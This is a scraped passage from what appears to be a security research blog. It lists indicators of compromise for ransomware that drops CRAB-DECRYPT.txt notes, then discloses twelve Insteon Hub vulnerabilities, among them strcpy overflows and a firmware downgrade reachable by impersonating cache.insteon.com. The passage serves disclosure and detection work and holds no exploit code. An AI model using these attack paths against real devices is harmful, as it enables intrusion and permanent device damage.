    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{DBC80044-A445-435B-BC74-9C25C1C588A9}
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\Component Categories
    • <HKU>\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
    • <HKU>\.DEFAULT\Software\Microsoft\SystemCertificates\My
    • <HKU>\.DEFAULT\Software\AppDataLow
    • <HKLM>\SOFTWARE\Microsoft\ESENT\Process\318730135\DEBUG
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\IntelliForms
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\Main
    • <HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLs
    • <HKLM>\System\CurrentControlSet\Control\SecurityProviders\Schannel
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\Toolbar
    • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WBEM\CIMOM
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MenuOrder
    • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{00021493-0000-0000-C000-000000000046}\Enum
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\VersionManager
    • <HKLM>\Software\Wow6432Node
    • <HKCU>\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
    • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
    • <HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Reliability
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLs
    • <HKCU>\SOFTWARE\Microsoft\CTF\MSUTB\
    • <HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
    • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\Zoom
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\EUPP\DSP
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic
    • <HKLM>\SYSTEM\CurrentControlSet\Services\VSS\Diag\COM+ REGDB Writer
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\2\Indexes
    • <HKLM>\SYSTEM\CurrentControlSet\Services\VSS\Diag\ASR Writer
    • <HKLM>\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\LogonSoundPlayed
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\User Preferences
    • <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\Root
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\Stats
    • <HKU>\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA
    • <HKU>\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
    • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
    • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{B4F3A835-0E21-4959-BA22-42B3008E02FF}
    • <HKLM>\Software\Microsoft\WBEM\CIMOM
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\Certificates
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\2
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\1
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES64\{00021494-0000-0000-C000-000000000046}
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FileIdIndex-{3f37ba64-ef5c-11e4-bb8d-806e6f6e6963}
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}
    • <HKU>\.DEFAULT\Software\AppDataLow\Software\Microsoft\RepService
    • <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\AuthRoot
    • <HKU>\.DEFAULT\SOFTWARE\Microsoft
    • <HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\Certificates
    • <HKU>\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\Explorer
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\Certificates
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\GPU
    • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\Discardable
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\Recovery
    • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLs
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLs
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\PostSetup
    • <HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLs
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\ObjectTable
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\1\INDEXES\FileIdIndex-{3f37ba64-ef5c-11e4-bb8d-806e6f6e6963}
    • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\Certificates
    • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\PageSetup
    • <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
    • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WBEM
    • <HKCU>\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify
    • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RELIABILITY\UserDefined
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLs
    • <HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLs
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\Suggested Sites
    • <HKU>\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}\iexplore
    • <HKU>\.DEFAULT\Software\AppDataLow\Software\Microsoft\Internet Explorer
    • <HKLM>\SYSTEM\CurrentControlSet\Services\VSS\Diag\Registry Writer
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\Explorer
    • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{2A541AE1-5BF6-4665-A8A3-CFA9672E4291}
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES64\{00021493-0000-0000-C000-000000000046}
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP
    Mutexes
    • \BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=ab8e4b3e3c28b0e4
    IP Addresses
    • 95[.]170[.]220[.]66
    • 185[.]242[.]190[.]97
    • 190[.]35[.]242[.]126
    • 13[.]107[.]21[.]200
    • 138[.]201[.]14[.]197
    • 109[.]166[.]237[.]170
    • 81[.]4[.]163[.]122
    • 95[.]43[.]11[.]180
    • 66[.]171[.]248[.]178
    • 154[.]35[.]132[.]71
    Domain Names
    • 1[.]0[.]168[.]192[.]in-addr[.]arpa
    • ns1[.]wowservers[.]ru
    • carder[.]bit
    • www[.]torproject[.]org
    • ipv4bot[.]whatismyipaddress[.]com
    • ns2[.]wowservers[.]ru
    • ransomware[.]bit
    Files and/or directories created
    • %LocalAppData%\Temp\pidor.bmp
    • %AppData%\Microsoft\Document Building Blocks\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\AddIns\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Templates\LiveContent\User\Document Themes\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Internet Explorer\UserData\19CDHY5T\CRAB-DECRYPT.txt
    • %UserProfile%\Cookies\CRAB-DECRYPT.txt
    • %SystemDrive%\Recovery\926583e2-ef64-11e4-beed-d6738078ad98\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Templates\LiveContent\User\SmartArt Graphics\1033\CRAB-DECRYPT.txt
    • %LocalAppData%\Microsoft\Internet Explorer\imagestore\aa4x2ky\imagestore.dat
    • %AppData%\Microsoft\gktngn.exe
    • %AppData%\Microsoft\Internet Explorer\UserData\N03JH1M1\CRAB-DECRYPT.txt
    • %AppData%\Media Center Programs\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Office\Recent\CRAB-DECRYPT.txt
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\sidenav-arrow[1].gif
    • %AppData%\Microsoft\Templates\LiveContent\User\Document Themes\1033\CRAB-DECRYPT.txt
    • %UserProfile%\Favorites\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\CRAB-DECRYPT.txt
    • %UserProfile%\Documents\OneNote Notebooks\CRAB-DECRYPT.txt
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\asay[1].htm
    • %LocalAppData%\Temp\~DF9ADF51BEE85B3E02.TMP
    • %AppData%\Macromedia\Flash Player\macromedia.com\CRAB-DECRYPT.txt
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\onion[1].jpg
    • %AppData%\Mozilla\Firefox\Profiles\1lcuq8ab.default\webapps\CRAB-DECRYPT.txt
    • %SystemDrive%\TEMP\CRAB-DECRYPT.txt
    • %LocalAppData%\Temporary Internet Files\CRAB-DECRYPT.txt
    • %AppData%\Mozilla\Firefox\Profiles\1lcuq8ab.default\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Vault\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Proof\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Internet Explorer\UserData\Low\CRAB-DECRYPT.txt
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\jquery-migrate-1.0.0.min[1].js
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\download-easy.html[1].htm
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\uipleiss[1].htm
    • %AppData%\Microsoft\Spelling\CRAB-DECRYPT.txt
    • %AppData%\Mozilla\Firefox\Crash Reports\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Word\CRAB-DECRYPT.txt
    • %ProgramFiles% (x86)\Microsoft SQL Server Compact Edition\v3.5\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Access\CRAB-DECRYPT.txt
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\button-downloadpage[1].png
    • %AppData%\Microsoft\Templates\LiveContent\Managed\Document Themes\CRAB-DECRYPT.txt
    • %AppData%\Adobe\Acrobat\9.0\Collab\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Internet Explorer\UserData\EUPM6R87\CRAB-DECRYPT.txt
    • %AppData%\Adobe\Flash Player\AssetCache\TRFRW6GU\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Internet Explorer\Quick Launch\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\CRAB-DECRYPT.txt
    • %SystemDrive%\MSOCache\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Crypto\RSA\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\CRAB-DECRYPT.txt
    • %SystemDrive%\System Volume Information\Chkdsk\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\CRAB-DECRYPT.txt
    • %AppData%\Adobe\Acrobat\9.0\Forms\CRAB-DECRYPT.txt
    • %UserProfile%\Saved Games\CRAB-DECRYPT.txt
    • %AppData%\CRAB-DECRYPT.txt
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\shadowAlpha[1].png
    • %AppData%\Microsoft\Templates\LiveContent\User\SmartArt Graphics\CRAB-DECRYPT.txt
    • %AppData%\Mozilla\CRAB-DECRYPT.txt
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\typography.min[1].css
    • %AppData%\Adobe\CRAB-DECRYPT.txt
    • %LocalAppData%\Temp\~DF3DE6857420342E9D.TMP
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\btn_donateCC_LG[1].gif
    • %AppData%\Adobe\Acrobat\9.0\JavaScripts\CRAB-DECRYPT.txt
    • %UserProfile%\Searches\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Templates\LiveContent\Managed\SmartArt Graphics\CRAB-DECRYPT.txt
    • %UserProfile%\Favorites\Microsoft Websites\CRAB-DECRYPT.txt
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\jquery.accordion.min[1].js
    • %SystemDrive%\Documents and Settings\CRAB-DECRYPT.txt
    • %SystemDrive%\System Volume Information\SPP\SppGroupCache\CRAB-DECRYPT.txt
    • %UserProfile%\Documents\My Videos\CRAB-DECRYPT.txt
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\master.min[1].css
    • %UserProfile%\Start Menu\CRAB-DECRYPT.txt
    • %AppData%\Mozilla\Firefox\Profiles\1lcuq8ab.default\minidumps\CRAB-DECRYPT.txt
    • %LocalAppData%\History\CRAB-DECRYPT.txt
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\reset.min[1].css
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\warning[1].png
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\jquery.ba-bbq.min[1].js
    • %AppData%\Microsoft\MSDN\8.0\CRAB-DECRYPT.txt
    • %UserProfile%\Favorites\MSN Websites\CRAB-DECRYPT.txt
    • %UserProfile%\NetHood\CRAB-DECRYPT.txt
    • %SystemDrive%\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-1002\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Stationery\CRAB-DECRYPT.txt
    • %AppData%\Adobe\Flash Player\AssetCache\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\OneNote\14.0\CRAB-DECRYPT.txt
    • %UserProfile%\Documents\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Publisher Building Blocks\CRAB-DECRYPT.txt
    • %SystemDrive%\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\CRAB-DECRYPT.txt
    • %System32%\config\systemprofile\AppData\LocalLow\Microsoft\Internet Explorer
    • %UserProfile%\Desktop\CRAB-DECRYPT.txt
    • \??\Volume{3f37ba64-ef5c-11e4-bb8d-806e6f6e6963}\System Volume Information\tracking.log.tmp
    • %UserProfile%\Templates\CRAB-DECRYPT.txt
    • %UserProfile%\Documents\My Pictures\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Internet Explorer\Quick Launch\User Pinned\CRAB-DECRYPT.txt
    • %System32%\config\systemprofile\AppData\LocalLow\Microsoft\Internet Explorer\Services
    • %AppData%\Macromedia\Flash Player\#SharedObjects\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Outlook\CRAB-DECRYPT.txt
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\cta-buttons[1].jpg
    • %AppData%\Macromedia\Flash Player\#SharedObjects\YXTRFETG\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Crypto\CRAB-DECRYPT.txt
    • %AppData%\Macromedia\CRAB-DECRYPT.txt
    • %UserProfile%\PrintHood\CRAB-DECRYPT.txt
    • %System32%\Microsoft\Protect\S-1-5-18\User\61c31507-0d97-4080-aca3-fd44f12c8dbd
    • %AppData%\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Protect\CRAB-DECRYPT.txt
    • %SystemDrive%\System Volume Information\SPP\OnlineMetadataCache\CRAB-DECRYPT.txt
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\layout.min[1].css
    • %AppData%\Microsoft\SystemCertificates\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\CRAB-DECRYPT.txt
    • %AppData%\Mozilla\Firefox\Profiles\CRAB-DECRYPT.txt
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\dlpage01[1].js
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\favicon[2].ico
    • %AppData%\Microsoft\Publisher\CRAB-DECRYPT.txt
    • %ProgramFiles% (x86)\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Internet Explorer\UserData\M2V73K19\CRAB-DECRYPT.txt
    • %AppData%\Adobe\Acrobat\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Internet Explorer\UserData\EXUAAUDV\CRAB-DECRYPT.txt
    • %UserProfile%\Documents\OneNote Notebooks\Personal\CRAB-DECRYPT.txt
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\favicon[1].ico
    • %SystemDrive%\PerfLogs\Admin\CRAB-DECRYPT.txt
    • %SystemDrive%\PerfLogs\CRAB-DECRYPT.txt
    • %UserProfile%\Recorded TV\CRAB-DECRYPT.txt
    • %UserProfile%\Documents\Outlook Files\CRAB-DECRYPT.txt
    • %AppData%\Adobe\Acrobat\9.0\CRAB-DECRYPT.txt
    • %SystemDrive%\CRAB-DECRYPT.txt
    • %ProgramFiles% (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\CRAB-DECRYPT.txt
    • \??\E:\$RECYCLE.BIN\S-1-5-21-2580483871-590521980-3826313501-500\CRAB-DECRYPT.txt
    • %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Document Building Blocks\1033\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Templates\LiveContent\Managed\CRAB-DECRYPT.txt
    • %UserProfile%\Favorites\Links\CRAB-DECRYPT.txt
    • %AppData%\Mozilla\Firefox\Profiles\1lcuq8ab.default\bookmarkbackups\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Office\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\MMC\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Internet Explorer\UserData\MA3SBLRS\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Credentials\CRAB-DECRYPT.txt
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\headerbg[1].jpg
    • %ProgramFiles%\CRAB-DECRYPT.txt
    • %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Internet Explorer\UserData\CRAB-DECRYPT.txt
    • %ProgramFiles% (x86)\Microsoft SQL Server Compact Edition\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Document Building Blocks\1033\14\CRAB-DECRYPT.txt
    • %SystemDrive%\System Volume Information\SPP\CRAB-DECRYPT.txt
    • %LocalAppData%\Microsoft\Internet Explorer\Recovery\High\Active\{50743783-67B4-11E8-8419-00501E3AE7B5}.dat
    • %UserProfile%\Contacts\CRAB-DECRYPT.txt
    • %UserProfile%\Links\CRAB-DECRYPT.txt
    • %LocalAppData%\CRAB-DECRYPT.txt
    • %UserProfile%\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Internet Explorer\UserData\8HDD5GFC\CRAB-DECRYPT.txt
    • %LocalAppData%\Temp\CRAB-DECRYPT.txt
    • %AppData%\Adobe\Flash Player\NativeCache\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Excel\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\OneNote\CRAB-DECRYPT.txt
    • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\X3FXG4H3.htm
    • %AppData%\Microsoft\Signatures\CRAB-DECRYPT.txt
    • %AppData%\Microsoft\SystemCertificates\My\Certificates\CRAB-DECRYPT.txt
    • %AppData%\Macromedia\Flash Player\CRAB-DECRYPT.txt
    • %UserProfile%\Downloads\CRAB-DECRYPT.txt
    File Hashes

    Coverage



    Screenshots of Detection

    AMP

    ThreatGrid

    Vulnerability Spotlight: Multiple Remote Vulnerabilities In Insteon Hub PubNub


    Vulnerabilities discovered by Claudio Bozzato of Cisco Talos

    Talos is disclosing twelve new vulnerabilities in Insteon Hub, ranging from remote code execution to denial of service. The majority of the vulnerabilities have their root cause in the unsafe usage of the strcpy() function, leading either to a stack overflow or a global overflow.

    Overview


    Insteon Hub is a central controller, which allows an end user to use a smartphone to connect to and manage devices in their home remotely. To enable remote interaction via the internet, Insteon Hub uses an online service called PubNub.
    End users install the "Insteon for Hub" application on their smartphone. Both the smartphone application and Insteon Hub include the PubNub software development kit, which allows for bidirectional communication using PubNub's REST API.
    Unless stated otherwise, the vulnerabilities were found in Insteon Hub 2245-222 running firmware version 1012. These vulnerabilities are fixed as of firmware version 1016; versions previous to this may be vulnerable.

    TALOS-2017-0483 - Message Handler Multiple Stack Overflow Remote Code Execution Vulnerabilities

    An exploitable buffer overflow vulnerability exists in the way the device handles commands sent through the PubNub service. Specially crafted commands can cause a stack-based buffer overflow, which overwrites arbitrary data due to the use of the strcpy() function while handling the JSON request. In order to be able to send such commands, the attacker needs to be authenticated in the PubNub service.

    Note. CVE rules require that we assign a separate CVE to each instance of a vulnerability that can be fixed independently.

    CVE: CVE-2017-16252 through CVE-2017-16337

    Full technical advisory is available.

    TALOS-2017-0484 - Message Handler Multiple Global Overflow Remote Code Execution Vulnerabilities

    An exploitable buffer overflow vulnerability exists in the way the device handles commands sent through the PubNub service. Specially crafted commands can cause a buffer overflow on a global section overwriting arbitrary data, due to the use of the strcpy() function while handling the JSON request. In order to be able to send such commands, the attacker needs to be authenticated in the PubNub service.

    CVE: CVE-2017-16338, CVE-2017-16339, CVE-2017-16340, CVE-2017-16341, CVE-2017-16342, CVE-2017-16343, CVE-2017-16344, CVE-2017-16345, CVE-2017-16346, CVE-2017-16347

    Full technical advisory is available.

    TALOS-2017-0485 - Reboot Task Denial Of Service Vulnerability

    An exploitable DoS vulnerability exists in the device firmware, which allows an attacker to arbitrarily reboot the device without authentication. An attacker can send a UDP packet to trigger this vulnerability.

    CVE: CVE-2017-16348

    Full technical advisory is available.

    TALOS-2017-0492 - HTTPExecuteGet Firmware Update Information Leak Vulnerability

    The HTTP server implementation incorrectly checks the number of GET parameters supplied, leading to an arbitrarily controlled information leak on the device's memory. In order to be able to send such commands, the attacker needs to be authenticated in the PubNub service.

    CVE: CVE-2017-14443

    Full technical advisory is available.

    TALOS-2017-0493 - HTTPExecuteGet Firmware Update URL Parameter Code Execution Vulnerability

    The HTTP server implementation incorrectly handles the URL parameter during a firmware update request, leading to a buffer overflow on a global section. The library used by the vendor does provide some level of protection against buffer overflows; however, by using vulnerability TALOS-2017-0492, it is possible to bypass this protection and achieve code execution. In order to be able to send such commands, the attacker needs to be authenticated in the PubNub service.

    CVE: CVE-2017-14444

    Full technical advisory is available.

    TALOS-2017-0494 - HTTPExecuteGet Firmware Update host Parameter Buffer Overflow Vulnerability

    The HTTP server implementation incorrectly handles the host parameter during a firmware update request, leading to a buffer overflow on a global section. The library used by the vendor does provide some level of protection against buffer overflows, which in this case, cannot be circumvented. In order to be able to send such commands, the attacker needs to be authenticated in the PubNub service.

    CVE: CVE-2017-14445

    Full technical advisory is available.

    TALOS-2017-0495 - HTTPExecuteGet Parameters Extraction Code Execution Vulnerability

    The HTTP server implementation unsafely extracts parameters from the query string, leading to a buffer overflow on the stack. The vulnerability exists because the extraction of the arguments is made without ensuring size constraints. In order to be able to send such commands, the attacker needs to be authenticated in the PubNub service.

    CVE: CVE-2017-14446

    Full technical advisory is available.

    TALOS-2017-0496 - Insteon Hub PubNub "ad" Channel Message Handler Code Execution Vulnerability

    An exploitable buffer overflow vulnerability exists in the PubNub message handler for the "ad" channel. A specially crafted command sent through the PubNub service can cause a stack-based buffer overflow, overwriting arbitrary data. In order to be able to send such commands, the attacker needs to be authenticated in the PubNub service.

    CVE: CVE-2017-14447

    Full technical advisory is available.

    TALOS-2017-0502 - Insteon Hub PubNub control Channel Message Handler Code Execution Vulnerabilities

    An exploitable buffer overflow vulnerability exists in the way the Hub handles the replies from PubNub, leading to the overwriting of arbitrary data in a global section. The attacker would need to impersonate PubNub and answer an HTTPS GET request to trigger this vulnerability.

    CVE: CVE-2017-14452, CVE-2017-14453, CVE-2017-14454, CVE-2017-14455

    Full technical advisory is available.

    TALOS-2018-0511 - Insteon Hub PubNub MPFS Upload Firmware Update Vulnerability

    The HTTP server allows for uploading arbitrary MPFS binaries that could be modified to enable access to hidden resources which allow for uploading unsigned firmware images to the device. To trigger this vulnerability, an attacker needs to have credentials that will be used to upload an MPFS binary via the "/mpfsupload" HTTP form and, later, upload the firmware via a POST request to "firmware.htm."

    This vulnerability was found on firmware version 1013.

    CVE: CVE-2018-3832

    Full technical advisory is available.

    TALOS-2018-0512 - Insteon Hub PubNub Firmware Downgrade Vulnerability

    An exploitable firmware downgrade vulnerability exists in Insteon Hub running firmware version 1013. The firmware upgrade functionality, triggered via PubNub, retrieves signed firmware binaries using plain HTTP requests. The device doesn't check the firmware version that is going to be installed, and thus allows for flashing older firmware images. To trigger this vulnerability, an attacker needs to impersonate the remote server "cache.insteon.com" and serve any signed firmware image.

    CVE: CVE-2018-3833

    Full technical advisory is available.

    TALOS-2018-0513 - Insteon Hub PubNub Firmware Upgrade Confusion Permanent Denial Of Service Vulnerability

    An exploitable permanent DoS vulnerability exists in Insteon Hub running firmware version 1013. The firmware upgrade functionality, triggered via PubNub, retrieves signed firmware binaries using plain HTTP requests. The device doesn't check the kind of firmware image that is going to be installed, and thus allows for flashing any signed firmware into any MCU. Since the device contains different and incompatible MCUs, flashing one firmware to the wrong MCU will result in a permanent unusable condition. To trigger this vulnerability, an attacker needs to impersonate the remote server "cache.insteon.com" and serve a signed firmware image.

    CVE: CVE-2018-3834

    Full technical advisory is available.

    Discussion


    Our previous vulnerability research on IoT devices (Foscam C1 Vulnerabilities, Circle with Disney) has shown that these kinds of devices are often vulnerable.

    Although several vulnerabilities were also found on Insteon Hub PubNub, some leading to remote code execution, it is worth mentioning that in order to exploit such vulnerabilities, the attacker needs to be in a privileged position. Some vulnerabilities require authentication into the PubNub portal. For others, the attacker needs to be in a position to perform a man-in-the-middle attack. Finally, the device itself also partially mitigates the vulnerability by limiting the size of the HTTP requests, which was proven effective in one of the vulnerabilities.

    Coverage


    The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

    Snort Rules: 45441, 45422, 44863, 45049, 45086, 45087, 44863, 45088 


    My Little FormBook

    This blog post is authored by Warren Mercer and Paul Rascagneres.

    Summary


